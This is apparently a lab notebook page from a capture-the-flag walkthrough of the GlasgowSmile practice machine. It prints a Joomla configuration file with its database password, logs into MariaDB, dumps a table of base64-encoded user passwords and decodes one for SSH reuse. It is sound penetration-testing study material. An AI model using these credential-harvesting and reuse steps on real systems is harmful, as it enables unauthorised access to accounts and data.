InfoSec LAB

GlasgowSmile_Joomla_Configurations

Created: 3 min read

Joomla Configurations

Checking for configurations of the target Joomla instance after performing a manual enumeration on the glasgowsmile host.

www-data@glasgowsmile:/var/www/html/joomla$ cat /var/www/html/joomla/configuration.php
on.phpar/www/html/joomla/configuratio
<?php
class JConfig {
	public $offline = '0';
	public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
	public $display_offline_message = '1';
	public $offline_image = '';
	public $sitename = 'Joker';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'joomla';
	public $password = 'babyjoker';
	public $db = 'joomla_db';
	public $dbprefix = 'jnqcu_';
	public $live_site = '';
	public $secret = 'fNRyp6KO51013435';
	public $gzip = '0';
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
	public $ftp_host = '';
	public $ftp_port = '';
	public $ftp_user = '';
	public $ftp_pass = '';
	public $ftp_root = '';
	public $ftp_enable = '0';
	public $offset = 'UTC';
	public $mailonline = '1';
	public $mailer = 'mail';
	public $mailfrom = 'admin@joker';
	public $fromname = 'Joker';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = '0';
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = '25';
	public $caching = '0';
	public $cache_handler = 'file';
	public $cachetime = '15';
	public $cache_platformprefix = '0';
	public $MetaDesc = '';
	public $MetaKeys = '';
	public $MetaTitle = '1';
	public $MetaAuthor = '1';
	public $MetaVersion = '0';
	public $robots = '';
	public $sef = '1';
	public $sef_rewrite = '0';
	public $sef_suffix = '0';
	public $unicodeslugs = '0';
	public $feed_limit = '10';
	public $feed_email = 'none';
	public $log_path = '/var/www/html/joomla/administrator/logs';
	public $tmp_path = '/var/www/html/joomla/tmp';
	public $lifetime = '15';
	public $session_handler = 'database';
	public $shared_session = '0';

DB credential identified; joomla:babyjoker. This was flagged by PEAS as well.

MySQL

www-data@glasgowsmile:/var/www/html/joomla$ mysql -ujoomla -pbabyjoker
mysql -ujoomla -pbabyjoker
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 3622
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]>

Session established.

MariaDB [(none)]> show datashow databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| batjoke            |
| information_schema |
| joomla_db          |
| mysql              |
| performance_schema |
+--------------------+
5 rows in set (0.002 sec)

2 none default DBs; batjoke and joomla_db. Nothing notable in the joomla_db DB.

batjoke DB

MariaDB [(none)]> SELECT table_name FROM information_schema.tables WHERE table_schema="batjoke";
 
+------------+
| table_name |
+------------+
| equipment  |
| taskforce  |
+------------+
2 rows in set (0.000 sec)

2 tables; equipment and taskforce.

batjoke.equipment Table

MariaDB [(none)]> SELECT * FROM batjoke.equipment;
Empty set (0.001 sec)

The batjoke.equipment table is empty.

batjoke.taskforce Table

MariaDB [(none)]> SELECT * FROM batjoke.taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type    | date       | name    | pswd                                         |
+----+---------+------------+---------+----------------------------------------------+
|  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                             |
|  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                             |
|  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                         |
|  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                         |
|  6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
|  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.001 sec)

A total of 7 credentials identified in the batjoke.taskforce table. rob is a valid system user. Passwords appear to be base64-encoded.

Decoding
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d
???AllIHaveAreNegativeThoughts???

Decoded password of the rob user is ???AllIHaveAreNegativeThoughts??? Testing it against the target SSH server.

Interactive Graph View

Backlinks